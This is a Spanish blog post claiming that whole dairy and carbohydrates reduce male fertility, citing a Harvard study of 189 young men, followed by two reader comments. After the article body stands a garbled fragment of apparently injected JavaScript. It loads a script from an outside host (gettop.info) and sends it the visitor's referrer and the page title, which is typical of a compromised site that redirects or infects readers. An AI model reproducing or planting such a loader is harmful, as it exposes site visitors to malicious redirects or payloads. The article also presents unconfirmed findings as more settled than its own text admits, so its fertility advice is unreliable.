Salud y belleza » Alimentación, Salud, Salud sexual, alimentos

Alimentos que disminuyen la fertilidad

2 Comentarios

fertilidad-alimentos-perjudicialesMucho se debate sobre qué alimentos son recomendables para el consumo si se quiere aumentar la fertilidad. Sin embargo, también habría que tener en cuenta aquellos alimentos que perjudican a la fertilidad y que disminuyen las probabilidades de tener un hijo. La leche entera o los carbohidratos podrían tener un impacto negativo sobre todo en la fertilidad masculina. Por eso vamos a darte algunos consejos que te ayudarán a aumentar tus posibilidades de concebir.

Los investigadores tenían claro hasta ahora que algunos alimentos ricos en grasas y carbohidratos provocan que la calidad del semen disminuya. Pero además, según recientes estudios de la Escuela de Salud Pública de Harvard podría haberse demostrado que los lácteos enteros afectan de forma negativa a la calidad del semen. Esta investigación usó a 189 hombres entre 19 y 25 años como sujetos de estudio y encontró que los que consumen tres raciones de productos lácteos enteros al día tienen una calidad de semen menor, por lo que su fertilidad disminuiría notablemente porque los espermatozoides son menos eficientes para fecundar al óvulo.

leche-perjudicial-fertilidadEsto podría estar provocado por una hormona femenina que se encuentra en la vaca y que está presente en estos lácteos, los estrógenos. Aún no se ha demostrado pero es una hipótesis bastante fuerte.

Por otro lado, los investigadores aseguran que los carbohidratos tienen efectos negativos sobre la fertilidad masculina, ya que un exceso de ellos disminuiría el número de espermatozoides. Además, si una pareja busca tener hijos se le recomienda comer más proteínas que carbohidratos.

Por tanto, no son meras especulaciones las que dicen que los carbohidratos y los lácteos perjudican a la fertilidad, son investigaciones científicas que obtienen sus primeros resultados y los publican. Todavía están por comprobar, pero la primera impresión saca estas conclusiones. Así que un factor muy importante para concebir un bebé es llevar una dieta saludable y equilibrada.

¿Crees que estos alimentos disminuyen la fertilidad? ¿Qué otros la aumentan?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; } else {

Más consejos de salud y belleza : , ,

2 Comments »

  • Isabel said:

    Había escuchado alguna vez lo de la leche pero no sabía si era verdad. parece que es cierto…

  • Marcos said:

    No Me digas los carobohidratos, si todos los deportistas consumemos muchos carbohidratos.

    Y influyen los mismos alimentos en la Libido ? o solo en la fertilidad?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.